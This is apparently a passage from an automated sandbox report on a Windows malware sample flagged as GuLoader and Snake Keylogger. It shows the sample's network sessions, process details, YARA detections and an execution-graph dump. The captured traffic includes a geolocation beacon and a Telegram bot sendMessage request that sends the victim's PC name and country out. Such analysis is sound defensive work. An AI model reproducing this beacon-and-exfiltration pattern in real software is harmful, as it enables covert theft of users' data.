                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NT3InCukBb7PzfZt1L3QkI3u7HI12RdcQtxkvqydCeSeT%2FsMzhdn753u4FoteUVhk%2FLobt4P72I9NOMIN%2BpBmxEcJI%2FoevvFYJcuD2G6b%2FEtiGSeAl3av3Zk6R6jBJTZ4PsR7qu9"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3ce8ea7e7bf-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1596&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1781057&cwnd=251&unsent_bytes=0&cid=30b14040ca8f5fb2&ts=153&x=0"
                                                                                                      2024-10-26 21:57:30 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-26 21:57:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      10192.168.2.461976188.114.96.34433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:31 UTC63OUTGET /xml/173.254.250.68 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-10-26 21:57:31 UTC897INHTTP/1.1 200 OK
                                                                                                      Date: Sat, 26 Oct 2024 21:57:31 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      vary: Accept-Encoding
                                                                                                      Cache-Control: max-age=86400
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 12
                                                                                                      Last-Modified: Sat, 26 Oct 2024 21:57:19 GMT
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFNPdMe%2BoyEtUwOm8G9%2F3u1eqeuLOtZ9sEIRkaPvKArYEpKswxYRALya%2BLVgDCTz%2BPzoKvhMdj5tnMv2lzXs%2FxQ0cAxt%2FUkOULEcvb1ohoOwDfy5R25EebdHlq0zS5GQQcu1Sqtl"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8d8db3d7beac6c74-DFW
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1140&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2448013&cwnd=251&unsent_bytes=0&cid=0b358a2c7152f94c&ts=155&x=0"
                                                                                                      2024-10-26 21:57:31 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                                      Data Ascii: 167<Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                                      2024-10-26 21:57:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.461981149.154.167.2204433492C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-26 21:57:32 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                      Host: api.telegram.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-10-26 21:57:32 UTC344INHTTP/1.1 404 Not Found
                                                                                                      Server: nginx/1.18.0
                                                                                                      Date: Sat, 26 Oct 2024 21:57:32 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Content-Length: 55
                                                                                                      Connection: close
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                      2024-10-26 21:57:32 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:17:55:56
                                                                                                      Start date:26/10/2024
                                                                                                      Path:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\JOSXXL1.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:811'667 bytes
                                                                                                      MD5 hash:FB24966DAAB46AF066A7B7C041236DE9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2321723084.000000000890B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:17:57:00
                                                                                                      Start date:26/10/2024
                                                                                                      Path:C:\Users\user\Desktop\JOSXXL1.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\JOSXXL1.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:811'667 bytes
                                                                                                      MD5 hash:FB24966DAAB46AF066A7B7C041236DE9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:false

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:19%
                                                                                                        Dynamic/Decrypted Code Coverage:13.5%
                                                                                                        Signature Coverage:20.2%
                                                                                                        Total number of Nodes:1562
                                                                                                        Total number of Limit Nodes:42
                                                                                                        execution_graph 5070 402840 5071 402bbf 18 API calls 5070->5071 5073 40284e 5071->5073 5072 402864 5075 405d33 2 API calls 5072->5075 5073->5072 5074 402bbf 18 API calls 5073->5074 5074->5072 5076 40286a 5075->5076 5098 405d58 GetFileAttributesW CreateFileW 5076->5098 5078 402877 5079 402883 GlobalAlloc 5078->5079 5080 40291a 5078->5080 5083 402911 CloseHandle 5079->5083 5084 40289c 5079->5084 5081 402922 DeleteFileW 5080->5081 5082 402935 5080->5082 5081->5082 5083->5080 5099 40336e SetFilePointer 5084->5099 5086 4028a2 5087 403358 ReadFile 5086->5087 5088 4028ab GlobalAlloc 5087->5088 5089 4028bb 5088->5089 5090 4028ef 5088->5090 5091 4030e7 45 API calls 5089->5091 5092 405e0a WriteFile 5090->5092 5093 4028c8 5091->5093 5094 4028fb GlobalFree 5092->5094 5096 4028e6 GlobalFree 5093->5096 5095 4030e7 45 API calls 5094->5095 5097 40290e 5095->5097 5096->5090 5097->5083 5098->5078 5099->5086 5100 10001000 5103 1000101b 5100->5103 5110 10001516 5103->5110 5105 10001020 5106 10001024 5105->5106 5107 10001027 GlobalAlloc 5105->5107 5108 1000153d 3 API calls 5106->5108 5107->5106 5109 10001019 5108->5109 5112 1000151c 5110->5112 5111 10001522 5111->5105 5112->5111 5113 1000152e GlobalFree 5112->5113 5113->5105 5114 401cc0 5115 402ba2 18 API calls 5114->5115 5116 401cc7 5115->5116 5117 402ba2 18 API calls 5116->5117 5118 401ccf GetDlgItem 5117->5118 5119 402531 5118->5119 5120 4029c0 5121 402ba2 18 API calls 5120->5121 5122 4029c6 5121->5122 5123 4029f9 5122->5123 5124 40281e 5122->5124 5126 4029d4 5122->5126 5123->5124 5125 4061a5 18 API calls 5123->5125 5125->5124 5126->5124 5128 4060ca wsprintfW 5126->5128 5128->5124 4162 401fc3 4163 401fd5 4162->4163 4164 402087 4162->4164 4185 402bbf 4163->4185 4167 401423 25 API calls 4164->4167 4173 4021e1 4167->4173 4168 402bbf 18 API calls 4169 401fe5 4168->4169 4170 401ffb LoadLibraryExW 4169->4170 4171 401fed GetModuleHandleW 4169->4171 4170->4164 4172 40200c 4170->4172 4171->4170 4171->4172 4191 4065c8 WideCharToMultiByte 4172->4191 4176 402056 4178 4052e2 25 API calls 4176->4178 4177 40201d 4179 402025 4177->4179 4180 40203c 4177->4180 4181 40202d 4178->4181 4236 401423 4179->4236 4194 10001759 4180->4194 4181->4173 4183 402079 FreeLibrary 4181->4183 4183->4173 4186 402bcb 4185->4186 4187 4061a5 18 API calls 4186->4187 4188 402bec 4187->4188 4189 401fdc 4188->4189 4190 406417 5 API calls 4188->4190 4189->4168 4190->4189 4192 4065f2 GetProcAddress 4191->4192 4193 402017 4191->4193 4192->4193 4193->4176 4193->4177 4195 10001789 4194->4195 4239 10001b18 4195->4239 4197 10001790 4198 100018a6 4197->4198 4199 100017a1 4197->4199 4200 100017a8 4197->4200 4198->4181 4288 10002286 4199->4288 4271 100022d0 4200->4271 4205 1000180c 4211 10001812 4205->4211 4212 1000184e 4205->4212 4206 100017ee 4301 100024a9 4206->4301 4207 100017d7 4221 100017cd 4207->4221 4298 10002b5f 4207->4298 4208 100017be 4210 100017c4 4208->4210 4216 100017cf 4208->4216 4210->4221 4282 100028a4 4210->4282 4218 100015b4 3 API calls 4211->4218 4214 100024a9 10 API calls 4212->4214 4219 10001840 4214->4219 4215 100017f4 4312 100015b4 4215->4312 4292 10002645 4216->4292 4223 10001828 4218->4223 4235 10001895 4219->4235 4323 1000246c 4219->4323 4221->4205 4221->4206 4224 100024a9 10 API calls 4223->4224 4224->4219 4226 100017d5 4226->4221 4228 1000189f GlobalFree 4228->4198 4232 10001881 4232->4235 4327 1000153d wsprintfW 4232->4327 4233 1000187a FreeLibrary 4233->4232 4235->4198 4235->4228 4237 4052e2 25 API calls 4236->4237 4238 401431 4237->4238 4238->4181 4330 1000121b GlobalAlloc 4239->4330 4241 10001b3c 4331 1000121b GlobalAlloc 4241->4331 4243 10001d7a GlobalFree GlobalFree GlobalFree 4245 10001d97 4243->4245 4263 10001de1 4243->4263 4244 10001b47 4244->4243 4248 10001c1d GlobalAlloc 4244->4248 4252 10001c68 lstrcpyW 4244->4252 4253 10001c86 GlobalFree 4244->4253 4255 10001c72 lstrcpyW 4244->4255 4261 10002048 4244->4261 4244->4263 4266 10001cc4 4244->4266 4267 10001f37 GlobalFree 4244->4267 4269 1000122c 2 API calls 4244->4269 4337 1000121b GlobalAlloc 4244->4337 4246 10001dac 4245->4246 4247 100020ee 4245->4247 4245->4263 4246->4263 4334 1000122c 4246->4334 4249 10002110 GetModuleHandleW 4247->4249 4247->4263 4248->4244 4250 10002121 LoadLibraryW 4249->4250 4251 10002136 4249->4251 4250->4251 4250->4263 4338 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4251->4338 4252->4255 4253->4244 4255->4244 4256 10002148 4257 10002188 4256->4257 4270 10002172 GetProcAddress 4256->4270 4258 10002195 lstrlenW 4257->4258 4257->4263 4339 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4258->4339 4261->4263 4265 10002090 lstrcpyW 4261->4265 4263->4197 4264 100021af 4264->4263 4265->4263 4266->4244 4332 1000158f GlobalSize GlobalAlloc 4266->4332 4267->4244 4269->4244 4270->4257 4280 100022e8 4271->4280 4273 10002415 GlobalFree 4274 100017ae 4273->4274 4273->4280 4274->4207 4274->4208 4274->4221 4275 100023d3 lstrlenW 4275->4273 4279 100023d1 4275->4279 4276 100023ba GlobalAlloc 4276->4279 4277 1000238f GlobalAlloc WideCharToMultiByte 4277->4273 4278 1000122c GlobalAlloc lstrcpynW 4278->4280 4279->4273 4345 100025d9 4279->4345 4280->4273 4280->4275 4280->4276 4280->4277 4280->4278 4341 100012ba 4280->4341 4284 100028b6 4282->4284 4283 1000295b ReadFile 4285 10002979 4283->4285 4284->4283 4286 10002a75 4285->4286 4287 10002a6a GetLastError 4285->4287 4286->4221 4287->4286 4289 10002296 4288->4289 4291 100017a7 4288->4291 4290 100022a8 GlobalAlloc 4289->4290 4289->4291 4290->4289 4291->4200 4296 10002661 4292->4296 4293 100026b2 GlobalAlloc 4297 100026d4 4293->4297 4294 100026c5 4295 100026ca GlobalSize 4294->4295 4294->4297 4295->4297 4296->4293 4296->4294 4297->4226 4299 10002b6a 4298->4299 4300 10002baa GlobalFree 4299->4300 4348 1000121b GlobalAlloc 4301->4348 4303 10002530 StringFromGUID2 4309 100024b3 4303->4309 4304 10002541 lstrcpynW 4304->4309 4305 1000250b MultiByteToWideChar 4305->4309 4306 10002554 wsprintfW 4306->4309 4307 10002571 GlobalFree 4307->4309 4308 100025ac GlobalFree 4308->4215 4309->4303 4309->4304 4309->4305 4309->4306 4309->4307 4309->4308 4310 10001272 2 API calls 4309->4310 4349 100012e1 4309->4349 4310->4309 4353 1000121b GlobalAlloc 4312->4353 4314 100015ba 4315 100015c7 lstrcpyW 4314->4315 4317 100015e1 4314->4317 4318 100015fb 4315->4318 4317->4318 4319 100015e6 wsprintfW 4317->4319 4320 10001272 4318->4320 4319->4318 4321 100012b5 GlobalFree 4320->4321 4322 1000127b GlobalAlloc lstrcpynW 4320->4322 4321->4219 4322->4321 4324 10001861 4323->4324 4325 1000247a 4323->4325 4324->4232 4324->4233 4325->4324 4326 10002496 GlobalFree 4325->4326 4326->4325 4328 10001272 2 API calls 4327->4328 4329 1000155e 4328->4329 4329->4235 4330->4241 4331->4244 4333 100015ad 4332->4333 4333->4266 4340 1000121b GlobalAlloc 4334->4340 4336 1000123b lstrcpynW 4336->4263 4337->4244 4338->4256 4339->4264 4340->4336 4342 100012c1 4341->4342 4343 1000122c 2 API calls 4342->4343 4344 100012df 4343->4344 4344->4280 4346 100025e7 VirtualAlloc 4345->4346 4347 1000263d 4345->4347 4346->4347 4347->4279 4348->4309 4350 100012ea 4349->4350 4351 1000130c 4349->4351 4350->4351 4352 100012f0 lstrcpyW 4350->4352 4351->4309 4352->4351 4353->4314 5129 4016c4 5130 402bbf 18 API calls 5129->5130 5131 4016ca GetFullPathNameW 5130->5131 5132 4016e4 5131->5132 5138 401706 5131->5138 5135 4064c6 2 API calls 5132->5135 5132->5138 5133 40171b GetShortPathNameW 5134 402a4c 5133->5134 5136 4016f6 5135->5136 5136->5138 5139 406183 lstrcpynW 5136->5139 5138->5133 5138->5134 5139->5138 5140 406847 5142 4066cb 5140->5142 5141 407036 5142->5141 5143 406755 GlobalAlloc 5142->5143 5144 40674c GlobalFree 5142->5144 5145 4067c3 GlobalFree 5142->5145 5146 4067cc GlobalAlloc 5142->5146 5143->5141 5143->5142 5144->5143 5145->5146 5146->5141 5146->5142 5150 40194e 5151 402bbf 18 API calls 5150->5151 5152 401955 lstrlenW 5151->5152 5153 402531 5152->5153 5154 4027ce 5155 4027d6 5154->5155 5156 4027da FindNextFileW 5155->5156 5158 4027ec 5155->5158 5157 402833 5156->5157 5156->5158 5160 406183 lstrcpynW 5157->5160 5160->5158 4580 401754 4581 402bbf 18 API calls 4580->4581 4582 40175b 4581->4582 4586 405d87 4582->4586 4584 401762 4585 405d87 2 API calls 4584->4585 4585->4584 4587 405d94 GetTickCount GetTempFileNameW 4586->4587 4588 405dce 4587->4588 4589 405dca 4587->4589 4588->4584 4589->4587 4589->4588 5168 405256 5169 405266 5168->5169 5170 40527a 5168->5170 5172 40526c 5169->5172 5180 4052c3 5169->5180 5171 405282 IsWindowVisible 5170->5171 5178 405299 5170->5178 5174 40528f 5171->5174 5171->5180 5173 404293 SendMessageW 5172->5173 5176 405276 5173->5176 5181 404bac SendMessageW 5174->5181 5175 4052c8 CallWindowProcW 5175->5176 5178->5175 5186 404c2c 5178->5186 5180->5175 5182 404c0b SendMessageW 5181->5182 5183 404bcf GetMessagePos ScreenToClient SendMessageW 5181->5183 5184 404c03 5182->5184 5183->5184 5185 404c08 5183->5185 5184->5178 5185->5182 5195 406183 lstrcpynW 5186->5195 5188 404c3f 5196 4060ca wsprintfW 5188->5196 5190 404c49 5191 40140b 2 API calls 5190->5191 5192 404c52 5191->5192 5197 406183 lstrcpynW 5192->5197 5194 404c59 5194->5180 5195->5188 5196->5190 5197->5194 5198 401d56 GetDC GetDeviceCaps 5199 402ba2 18 API calls 5198->5199 5200 401d74 MulDiv ReleaseDC 5199->5200 5201 402ba2 18 API calls 5200->5201 5202 401d93 5201->5202 5203 4061a5 18 API calls 5202->5203 5204 401dcc CreateFontIndirectW 5203->5204 5205 402531 5204->5205 4973 4014d7 4978 402ba2 4973->4978 4975 4014dd Sleep 4977 402a4c 4975->4977 4979 4061a5 18 API calls 4978->4979 4980 402bb6 4979->4980 4980->4975 5206 401a57 5207 402ba2 18 API calls 5206->5207 5208 401a5d 5207->5208 5209 402ba2 18 API calls 5208->5209 5210 401a05 5209->5210 5211 40435b lstrcpynW lstrlenW 5212 40155b 5213 4029f2 5212->5213 5216 4060ca wsprintfW 5213->5216 5215 4029f7 5216->5215 5028 401ddc 5029 402ba2 18 API calls 5028->5029 5030 401de2 5029->5030 5031 402ba2 18 API calls 5030->5031 5032 401deb 5031->5032 5033 401df2 ShowWindow 5032->5033 5034 401dfd EnableWindow 5032->5034 5035 402a4c 5033->5035 5034->5035 5217 404c5e GetDlgItem GetDlgItem 5218 404cb0 7 API calls 5217->5218 5224 404ec9 5217->5224 5219 404d53 DeleteObject 5218->5219 5220 404d46 SendMessageW 5218->5220 5221 404d5c 5219->5221 5220->5219 5222 404d93 5221->5222 5225 4061a5 18 API calls 5221->5225 5226 404247 19 API calls 5222->5226 5223 404fad 5227 405059 5223->5227 5232 404ebc 5223->5232 5237 405006 SendMessageW 5223->5237 5224->5223 5235 404bac 5 API calls 5224->5235 5251 404f3a 5224->5251 5228 404d75 SendMessageW SendMessageW 5225->5228 5231 404da7 5226->5231 5229 405063 SendMessageW 5227->5229 5230 40506b 5227->5230 5228->5221 5229->5230 5239 405084 5230->5239 5240 40507d ImageList_Destroy 5230->5240 5247 405094 5230->5247 5236 404247 19 API calls 5231->5236 5233 4042ae 8 API calls 5232->5233 5238 40524f 5233->5238 5234 404f9f SendMessageW 5234->5223 5235->5251 5252 404db5 5236->5252 5237->5232 5242 40501b SendMessageW 5237->5242 5243 40508d GlobalFree 5239->5243 5239->5247 5240->5239 5241 405203 5241->5232 5248 405215 ShowWindow GetDlgItem ShowWindow 5241->5248 5245 40502e 5242->5245 5243->5247 5244 404e8a GetWindowLongW SetWindowLongW 5246 404ea3 5244->5246 5257 40503f SendMessageW 5245->5257 5249 404ec1 5246->5249 5250 404ea9 ShowWindow 5246->5250 5247->5241 5260 404c2c 4 API calls 5247->5260 5264 4050cf 5247->5264 5248->5232 5269 40427c SendMessageW 5249->5269 5268 40427c SendMessageW 5250->5268 5251->5223 5251->5234 5252->5244 5253 404e84 5252->5253 5256 404e05 SendMessageW 5252->5256 5258 404e41 SendMessageW 5252->5258 5259 404e52 SendMessageW 5252->5259 5253->5244 5253->5246 5256->5252 5257->5227 5258->5252 5259->5252 5260->5264 5261 4051d9 InvalidateRect 5261->5241 5262 4051ef 5261->5262 5270 404b67 5262->5270 5263 4050fd SendMessageW 5267 405113 5263->5267 5264->5263 5264->5267 5266 405187 SendMessageW SendMessageW 5266->5267 5267->5261 5267->5266 5268->5232 5269->5224 5273 404a9e 5270->5273 5272 404b7c 5272->5241 5274 404ab7 5273->5274 5275 4061a5 18 API calls 5274->5275 5276 404b1b 5275->5276 5277 4061a5 18 API calls 5276->5277 5278 404b26 5277->5278 5279 4061a5 18 API calls 5278->5279 5280 404b3c lstrlenW wsprintfW SetDlgItemTextW 5279->5280 5280->5272 5281 4022df 5282 402bbf 18 API calls 5281->5282 5283 4022ee 5282->5283 5284 402bbf 18 API calls 5283->5284 5285 4022f7 5284->5285 5286 402bbf 18 API calls 5285->5286 5287 402301 GetPrivateProfileStringW 5286->5287 5288 401bdf 5289 402ba2 18 API calls 5288->5289 5290 401be6 5289->5290 5291 402ba2 18 API calls 5290->5291 5292 401bf0 5291->5292 5293 401c00 5292->5293 5294 402bbf 18 API calls 5292->5294 5295 401c10 5293->5295 5296 402bbf 18 API calls 5293->5296 5294->5293 5297 401c1b 5295->5297 5298 401c5f 5295->5298 5296->5295 5299 402ba2 18 API calls 5297->5299 5300 402bbf 18 API calls 5298->5300 5301 401c20 5299->5301 5302 401c64 5300->5302 5303 402ba2 18 API calls 5301->5303 5304 402bbf 18 API calls 5302->5304 5305 401c29 5303->5305 5306 401c6d FindWindowExW 5304->5306 5307 401c31 SendMessageTimeoutW 5305->5307 5308 401c4f SendMessageW 5305->5308 5309 401c8f 5306->5309 5307->5309 5308->5309 5310 401960 5311 402ba2 18 API calls 5310->5311 5312 401967 5311->5312 5313 402ba2 18 API calls 5312->5313 5314 401971 5313->5314 5315 402bbf 18 API calls 5314->5315 5316 40197a 5315->5316 5317 40198e lstrlenW 5316->5317 5318 4019ca 5316->5318 5319 401998 5317->5319 5319->5318 5323 406183 lstrcpynW 5319->5323 5321 4019b3 5321->5318 5322 4019c0 lstrlenW 5321->5322 5322->5318 5323->5321 5324 401662 5325 402bbf 18 API calls 5324->5325 5326 401668 5325->5326 5327 4064c6 2 API calls 5326->5327 5328 40166e 5327->5328 5329 4046e2 5330 40470e 5329->5330 5331 40471f 5329->5331 5390 4058ac GetDlgItemTextW 5330->5390 5332 40472b GetDlgItem 5331->5332 5339 40478a 5331->5339 5334 40473f 5332->5334 5338 404753 SetWindowTextW 5334->5338 5342 405be2 4 API calls 5334->5342 5335 40486e 5388 404a1d 5335->5388 5392 4058ac GetDlgItemTextW 5335->5392 5336 404719 5337 406417 5 API calls 5336->5337 5337->5331 5343 404247 19 API calls 5338->5343 5339->5335 5344 4061a5 18 API calls 5339->5344 5339->5388 5341 4042ae 8 API calls 5346 404a31 5341->5346 5347 404749 5342->5347 5348 40476f 5343->5348 5349 4047fe SHBrowseForFolderW 5344->5349 5345 40489e 5350 405c3f 18 API calls 5345->5350 5347->5338 5354 405b37 3 API calls 5347->5354 5351 404247 19 API calls 5348->5351 5349->5335 5352 404816 CoTaskMemFree 5349->5352 5353 4048a4 5350->5353 5355 40477d 5351->5355 5356 405b37 3 API calls 5352->5356 5393 406183 lstrcpynW 5353->5393 5354->5338 5391 40427c SendMessageW 5355->5391 5358 404823 5356->5358 5362 40485a SetDlgItemTextW 5358->5362 5365 4061a5 18 API calls 5358->5365 5360 4048bb 5364 406559 5 API calls 5360->5364 5361 404783 5363 406559 5 API calls 5361->5363 5362->5335 5363->5339 5376 4048c2 5364->5376 5366 404842 lstrcmpiW 5365->5366 5366->5362 5368 404853 lstrcatW 5366->5368 5367 404903 5394 406183 lstrcpynW 5367->5394 5368->5362 5370 40490a 5371 405be2 4 API calls 5370->5371 5372 404910 GetDiskFreeSpaceW 5371->5372 5374 404934 MulDiv 5372->5374 5377 40495b 5372->5377 5374->5377 5375 405b83 2 API calls 5375->5376 5376->5367 5376->5375 5376->5377 5378 4049cc 5377->5378 5380 404b67 21 API calls 5377->5380 5379 4049ef 5378->5379 5382 40140b 2 API calls 5378->5382 5395 404269 KiUserCallbackDispatcher 5379->5395 5381 4049b9 5380->5381 5383 4049ce SetDlgItemTextW 5381->5383 5384 4049be 5381->5384 5382->5379 5383->5378 5386 404a9e 21 API calls 5384->5386 5386->5378 5387 404a0b 5387->5388 5396 404677 5387->5396 5388->5341 5390->5336 5391->5361 5392->5345 5393->5360 5394->5370 5395->5387 5397 404685 5396->5397 5398 40468a SendMessageW 5396->5398 5397->5398 5398->5388 5399 4043e4 5401 404516 5399->5401 5402 4043fc 5399->5402 5400 404580 5403 404652 5400->5403 5404 40458a GetDlgItem 5400->5404 5401->5400 5401->5403 5408 404551 GetDlgItem SendMessageW 5401->5408 5405 404247 19 API calls 5402->5405 5410 4042ae 8 API calls 5403->5410 5406 404613 5404->5406 5407 4045a4 5404->5407 5409 404463 5405->5409 5406->5403 5411 404625 5406->5411 5407->5406 5415 4045ca 6 API calls 5407->5415 5430 404269 KiUserCallbackDispatcher 5408->5430 5413 404247 19 API calls 5409->5413 5414 40464d 5410->5414 5416 40463b 5411->5416 5417 40462b SendMessageW 5411->5417 5419 404470 CheckDlgButton 5413->5419 5415->5406 5416->5414 5420 404641 SendMessageW 5416->5420 5417->5416 5418 40457b 5421 404677 SendMessageW 5418->5421 5428 404269 KiUserCallbackDispatcher 5419->5428 5420->5414 5421->5400 5423 40448e GetDlgItem 5429 40427c SendMessageW 5423->5429 5425 4044a4 SendMessageW 5426 4044c1 GetSysColor 5425->5426 5427 4044ca SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5425->5427 5426->5427 5427->5414 5428->5423 5429->5425 5430->5418 5431 4019e4 5432 402bbf 18 API calls 5431->5432 5433 4019eb 5432->5433 5434 402bbf 18 API calls 5433->5434 5435 4019f4 5434->5435 5436 4019fb lstrcmpiW 5435->5436 5437 401a0d lstrcmpW 5435->5437 5438 401a01 5436->5438 5437->5438 5439 4025e5 5440 402ba2 18 API calls 5439->5440 5447 4025f4 5440->5447 5441 40272d 5442 40263a ReadFile 5442->5441 5442->5447 5443 405ddb ReadFile 5443->5447 5444 40267a MultiByteToWideChar 5444->5447 5445 40272f 5461 4060ca wsprintfW 5445->5461 5447->5441 5447->5442 5447->5443 5447->5444 5447->5445 5449 4026a0 SetFilePointer MultiByteToWideChar 5447->5449 5450 402740 5447->5450 5452 405e39 SetFilePointer 5447->5452 5449->5447 5450->5441 5451 402761 SetFilePointer 5450->5451 5451->5441 5453 405e55 5452->5453 5458 405e71 5452->5458 5454 405ddb ReadFile 5453->5454 5455 405e61 5454->5455 5456 405ea2 